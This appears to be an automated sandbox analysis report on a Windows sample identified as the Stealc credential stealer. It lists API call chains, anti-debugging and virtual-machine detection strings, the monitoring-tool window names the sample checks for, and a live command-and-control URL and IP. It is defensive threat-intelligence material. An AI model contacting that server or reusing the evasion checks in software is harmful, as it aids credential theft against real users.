              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00FC3910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00FC1269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00FC1250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FCE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00FCE210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FCCBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00FCCBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00FC23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00FBDB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00FC2390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00FBDB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00FC4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00FC4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FCD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00FCD530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FCDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_00FCDD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00FB16B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00FB16A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FD1BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_00FD1BF0
              Source: file.exe, file.exe, 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.1746029554.0000000001BF6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1746029554.0000000001BC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.1746029554.0000000001B7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25257
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25264
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25110
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25128
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01378868 rdtsc 0_2_01378868
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB4A60 VirtualProtect 00000000,00000004,00000100,?0_2_00FB4A60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FD6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00FD6390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FD6390 mov eax, dword ptr fs:[00000030h]0_2_00FD6390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FD2AD0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00FD2AD0
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6724, type: MEMORYSTR
              Searches for specific processes (likely to inject)
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FD46A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_00FD46A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FD4610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_00FD4610
              Source: file.exe, file.exe, 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 2RProgram Manager
              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00FD2D60
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FD2B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00FD2B60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FD2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00FD2A40
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FD2C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00FD2C10

              Stealing of Sensitive Information

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000002.1746029554.0000000001B7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1698627871.0000000005750000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6724, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Remote Access Functionality

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000002.1746029554.0000000001B7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1698627871.0000000005750000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6724, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter              		1
              Create Account              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		2
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts13
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		33
              Virtualization/Sandbox Evasion              		LSASS Memory651
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Disable or Modify Tools              		Security Account Manager33
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection              		NTDS13
              Process Discovery              		Distributed Component Object ModelInput Capture12
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              Account Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information              		Cached Domain Credentials1
              System Owner/User Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing              		DCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc Filesystem324
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://185.215.113.206/c4becf79229cb002.php$XV100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://185.215.113.206/c4becf79229cb002.phpfalse
                		high
                http://185.215.113.206/false
                  		high
                  185.215.113.206/c4becf79229cb002.phpfalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206/c4becf79229cb002.phpifile.exe, 00000000.00000002.1746029554.0000000001BD7000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://185.215.113.206/c4becf79229cb002.php/file.exe, 00000000.00000002.1746029554.0000000001BD7000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://185.215.113.206file.exe, 00000000.00000002.1746029554.0000000001B7E000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://185.215.113.206/Lfile.exe, 00000000.00000002.1746029554.0000000001BD7000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://185.215.113.206/wsfile.exe, 00000000.00000002.1746029554.0000000001BD7000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://185.215.113.206/c4becf79229cb002.php$XVfile.exe, 00000000.00000002.1746029554.0000000001BD7000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              http://185.215.113.206/ufile.exe, 00000000.00000002.1746029554.0000000001B7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                185.215.113.206
                                		unknownPortugal
                                		206894WHOLESALECONNECTIONSNLtrue

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1562041
                                Start date and time:2024-11-25 06:35:08 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 3m 8s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:1
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:file.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@1/0@0/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 80%
                                • Number of executed functions: 18
                                • Number of non-executed functions: 119
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Stop behavior analysis, all processes terminated

                                Simulations

                                Behavior and APIs

                                No simulations

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                185.215.113.206file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, VidarBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/c4becf79229cb002.php

                                Domains

                                No context

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousLummaC StealerBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, VidarBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousLummaC StealerBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousLummaC StealerBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousLummaC StealerBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousLummaC StealerBrowse
                                • 185.215.113.16

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                No created / dropped files found

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.944312558078617
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:file.exe
                                File size:1'771'008 bytes
                                MD5:ec2b785f84c4c57983920f431a8f78ce
                                SHA1:cfc54b34762d4a0e5036a9ea5566865721cf6a9f
                                SHA256:8c03b7c9bc22de662f3340049dd7fc98a640b99c0e4b58c1bf3a0d334be53ba8
                                SHA512:c0dffb2c75fbee616fa11a3bf017e3478a913f9cfa535d259c48f2b8084eecae97b968374256066f51b77d00d0f4d0ce610fd798d8dc0b89ca314ff40f37c170
                                SSDEEP:49152:rcK7f3mEtO89aTh2aK2MbMl3zoRlJULDWcAn:rcK7f3man9aYoEMljalem
                                TLSH:6B85331EEFCB81D8C3AD54B47F62105AA7A91315286008D1EB76681ACC7319BBCD3D9E
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..

                                File Icon

                                Icon Hash:90cececece8e8eb0

                                Static PE Info

                                General

                                Entrypoint:0xa7d000
                                Entrypoint Section:.taggant
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:2eabe9054cad5152567f0699947a2c5b

                                Entrypoint Preview

                                Instruction
                                jmp 00007F43792AA61Ah
                                pmulhuw mm3, qword ptr [edx]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add cl, ch
                                add byte ptr [eax], ah
                                add byte ptr [eax], al
                                add byte ptr [edi], al
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], dh
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add bh, bh

                                Rich Headers

                                Programming Language:
                                • [C++] VS2010 build 30319
                                • [ASM] VS2010 build 30319
                                • [ C ] VS2010 build 30319
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2010 build 30319

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x2b0.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
